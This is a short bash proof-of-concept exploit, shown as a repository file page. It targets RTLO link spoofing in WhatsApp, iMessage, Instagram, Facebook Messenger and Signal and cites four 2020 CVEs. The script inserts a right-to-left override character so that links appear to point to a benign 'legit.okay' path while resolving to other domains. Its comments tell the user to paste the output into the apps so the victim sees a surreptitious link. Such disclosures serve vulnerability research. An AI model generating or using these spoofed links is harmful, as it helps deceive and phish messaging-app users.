/
exploit.sh
62 lines (50 loc) · 1.66 KB
/
exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version 2.19.80 and below
# Tested on: Whatsapp Android
# Version 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096
#!/bin/bash
# Author: sickcodes
# Contact: https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright: sickcodes (C) 2022
# License: GPLv3+
# References: https://github.com/zadewg/RIUS
# https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
# https://sick.codes/sick-2022-40
DESTINATIONS=(4pm.asia
4pm.tv
gepj.live
gepj.xyz
kpa.li
xcod.xyz
4pm.tv
gepj.net)
APPEAR_AS='https://legit.okay/files'
for DESTINATION in "${DESTINATIONS[@]}"; do
printf "${APPEAR_AS}/\u202E${DESTINATION}\n"
done
# copy paste into any of the above apps.
# victim will see a surreptitious link
# works on latest Signal (unpatched)